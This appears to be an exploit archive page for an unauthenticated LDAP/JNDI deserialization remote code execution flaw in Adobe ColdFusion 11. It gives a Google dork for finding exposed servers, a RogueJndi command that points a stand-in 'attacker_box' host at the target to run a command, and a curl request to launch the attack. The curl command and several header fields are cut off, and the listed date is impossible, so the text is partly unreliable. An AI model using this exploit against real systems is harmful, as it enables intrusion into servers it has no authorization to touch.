Adobe ColdFusion 11 Remote Code Execution

Adobe ColdFusion version suffers from an LDAP Java object deserialization remote code execution vulnerability.

MD5 | 226123e631e2f9b3d10af17056b116ce

# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
# Google Dork: intext:"adobe coldfusion 11"
# Date: 2022-22-02
# Exploit Author: Amel BOUZIANE-LEBLOND (
# Vendor Homepage:
# Version: Adobe Coldfusion (
# Tested on: Microsoft Windows Server & Linux

# Description:
# ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution.
# JNDI attack via the 'verifyldapserver' parameter on the utils.cfc

==================== 1.Setup rogue-jndi Server ====================

==================== 2.Preparing the Attack =======================

java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box"

==================== 3.Launch the Attack ==========================


curl -i -s -k -X $'GET' \
-H $'Host: target' \
--data-binary $'\x0d\x0a\x0d\x0a' \

==================== 4.RCE =======================================

Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8
Can be done by modify the pom.xml as below


Related Posts